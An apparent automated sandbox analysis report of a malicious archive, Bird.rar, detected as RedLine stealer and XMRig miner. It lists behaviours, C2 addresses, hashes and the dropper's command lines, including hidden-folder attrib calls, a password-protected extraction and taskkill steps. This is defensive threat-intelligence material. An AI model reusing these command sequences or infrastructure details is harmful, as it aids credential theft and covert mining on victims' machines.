Analysis Overview
SHA256
c6897ee5e6e0c63e0cf1866460859894664359d397f9d453546adf12c7794818
Threat Level: Known bad
The file Bird.rar was found to be: Known bad.
Malicious Activity Summary
RedLine Payload
Echelon
RedLine
xmrig
Echelon log file
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner Payload
Executes dropped EXE
Downloads MZ/PE file
Blocklisted process makes network request
Sets file to hidden
Themida packer
Checks BIOS information in registry
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Looks up external IP address via web service
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Detects Pyinstaller
Modifies registry class
Checks processor information in registry
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies system certificate store
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-11 12:52
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win7v20210410
Max time kernel
18s
Max time network
55s
Command Line
Signatures
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Bird.exe
"C:\Users\Admin\AppData\Local\Temp\Bird.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 65.21.103.71:56458 | 65.21.103.71 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/1860-60-0x0000000075721000-0x0000000075723000-memory.dmp
memory/1860-62-0x0000000000980000-0x0000000000981000-memory.dmp
memory/1860-64-0x00000000050A0000-0x00000000050A1000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210408
Max time kernel
24s
Max time network
126s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 45.14.49.109:54819 | 45.14.49.109 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
Files
memory/900-118-0x0000000000400000-0x0000000002C86000-memory.dmp
memory/900-117-0x0000000004870000-0x000000000489F000-memory.dmp
memory/900-119-0x0000000004AF0000-0x0000000004B0C000-memory.dmp
memory/900-120-0x00000000073E0000-0x00000000073E1000-memory.dmp
memory/900-121-0x00000000073E2000-0x00000000073E3000-memory.dmp
memory/900-122-0x00000000073E3000-0x00000000073E4000-memory.dmp
memory/900-123-0x00000000073F0000-0x00000000073F1000-memory.dmp
memory/900-124-0x0000000004CE0000-0x0000000004CFA000-memory.dmp
memory/900-125-0x00000000078F0000-0x00000000078F1000-memory.dmp
memory/900-126-0x0000000007270000-0x0000000007271000-memory.dmp
memory/900-127-0x0000000007290000-0x0000000007291000-memory.dmp
memory/900-128-0x00000000072F0000-0x00000000072F1000-memory.dmp
memory/900-129-0x00000000073E4000-0x00000000073E6000-memory.dmp
memory/900-130-0x0000000007FA0000-0x0000000007FA1000-memory.dmp
memory/900-131-0x0000000008C80000-0x0000000008C81000-memory.dmp
memory/900-132-0x0000000008E50000-0x0000000008E51000-memory.dmp
memory/900-133-0x0000000009480000-0x0000000009481000-memory.dmp
memory/900-134-0x00000000099F0000-0x00000000099F1000-memory.dmp
memory/900-135-0x0000000009AB0000-0x0000000009AB1000-memory.dmp
memory/900-136-0x0000000009BB0000-0x0000000009BB1000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win7v20210408
Max time kernel
129s
Max time network
137s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\NSpack\updIns\Sgsmmodul.com | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Sets file to hidden
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1696 set thread context of 744 | N/A | C:\NSpack\updIns\mmscx.exe | C:\NSpack\updIns\mmscx.exe |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\file3.exe
"C:\Users\Admin\AppData\Local\Temp\file3.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\tetracom.vbs" /f=CREATE_NO_WINDOW install.cmd
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\NSpack\updIns\44t.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 7
C:\NSpack\updIns\Sgsmmodul.com
"Sgsmmodul.com" e -pEktfsdu78s8f87Ap8pHr6Mqaq9SQ mit.rar
C:\Windows\SysWOW64\timeout.exe
timeout 6
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\sevenup.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 8
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\NSpack\updIns\gg4359.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\NSpack\updIns"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\NSpack\updIns"
C:\Windows\SysWOW64\timeout.exe
timeout 4
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sandedean.xyz | udp |
| N/A | 212.224.105.82:80 | sandedean.xyz | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.82:80 | sandedean.xyz | tcp |
Files
memory/1820-60-0x0000000076641000-0x0000000076643000-memory.dmp
memory/2032-61-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\tetracom.vbs
| MD5 | bdc0fb5cada9a89f074961224aaf4e63 |
| SHA1 | 9284fe4ecc0fde705fc596dd89191c02915fd7a4 |
| SHA256 | b6156e744da7ffcd5e47e78d487b2ad78b1babf44aaa4145d706247f308106db |
| SHA512 | 83cdf2cdc78106075fe5d8dfaa84fabae7251e76d8b706e74491291a03366bacd94ede79893e62f62f52c13c4cf1e5b5e53ebd49942d3789b01724464ee6ee28 |
C:\NSpack\updIns\44t.bat
| MD5 | 96c69dbc1233bfa7c5e883658e0758d4 |
| SHA1 | 613179fa74db9e71516bdb3a93341e9d90c4ecba |
| SHA256 | deb0fa40647bb04decbdf7e62fd62985bceb5a47ab5f15556763b8db1266acde |
| SHA512 | 43d0621374de43a216086807ac90f3dac4339975cfca251e762c84680bbe4932dfcfee9d08e5c2ff113fa2b4db50e4e8ede960864da34d8905e76851ed91e0d3 |
memory/1928-65-0x0000000000000000-mapping.dmp
memory/1256-67-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\dc.isi
| MD5 | fbd467e1613c53b03376e987f3dbf2da |
| SHA1 | e2ca3ff625122f49e8a382dee32d0ca2f98648bf |
| SHA256 | cca183bc9bb6e35a4713e1e25e80147ff5ab3857984a22ce74b5836f6e98ab68 |
| SHA512 | e2cf3762d688a9d4b43224e86a258751085734af3da3bac93cc3baabb8499b2147c8026dcfc9745fedc5b906116cf1e59f010ad342b43ae242dbc47755fc0e05 |
\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
C:\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
memory/736-72-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
memory/856-75-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\sevenup.vbs
| MD5 | 6a551928353982ab64107a4929c91c91 |
| SHA1 | b68ee5e77a722638f184d0fbf6a4834bb8cc188e |
| SHA256 | 0281bbb85161fdb990c6f1c149a7e4bbaafe262f028e4fb66ffa995e2c4a45f3 |
| SHA512 | 870ef201fafd9d0036dcb4ea912676157075089390c9fecd0ad45d805e38bd74c5dc1fd413e9b765df50249628968ef8684b1b9ea57e2340769553e818c2159d |
memory/1768-78-0x0000000000000000-mapping.dmp
memory/1288-79-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\gg4359.bat
| MD5 | b4be21a8f4bb91b11ccaf08b39b679d5 |
| SHA1 | b3da567bb1072168b54866ee29301bde61bdc45e |
| SHA256 | 35e6fbd496632c91eb924e1d3b7749eeba36125bc4551624786b171bea1d465d |
| SHA512 | a52f7e9ad3ae76abe66920608c8b33a899ace0a4f4600903dc721a822114d5928cd85701a7405ef8ee1dc1aaa295174124a63ccec3e3fd3e347f01dbb2011f3c |
memory/920-83-0x0000000000000000-mapping.dmp
memory/1088-85-0x0000000000000000-mapping.dmp
memory/368-87-0x0000000000000000-mapping.dmp
\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/1696-92-0x0000000000000000-mapping.dmp
\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/744-96-0x0000000000400000-0x0000000000434000-memory.dmp
memory/744-97-0x000000000040CD2F-mapping.dmp
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/1604-99-0x0000000000000000-mapping.dmp
memory/1308-102-0x0000000000000000-mapping.dmp
memory/1028-104-0x0000000000000000-mapping.dmp
memory/952-106-0x0000000000000000-mapping.dmp
memory/744-108-0x0000000000400000-0x0000000000434000-memory.dmp
memory/744-109-0x00000000004B0000-0x00000000004CD000-memory.dmp
memory/744-110-0x0000000004861000-0x0000000004862000-memory.dmp
memory/744-111-0x0000000004862000-0x0000000004863000-memory.dmp
memory/744-112-0x0000000001CC0000-0x0000000001CDB000-memory.dmp
memory/744-113-0x0000000004863000-0x0000000004864000-memory.dmp
memory/744-114-0x0000000004864000-0x0000000004866000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210408
Max time kernel
149s
Max time network
185s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Datafile32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\intobroker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\system32\services32.exe | N/A |
| N/A | N/A | C:\Windows\system32\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Libs\sihost64.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\sihost64.log | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.log | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File opened for modification | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\services64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File opened for modification | C:\Windows\system32\services64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1740 set thread context of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | C:\Windows\System32\cmd.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\intobroker.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b30090603550406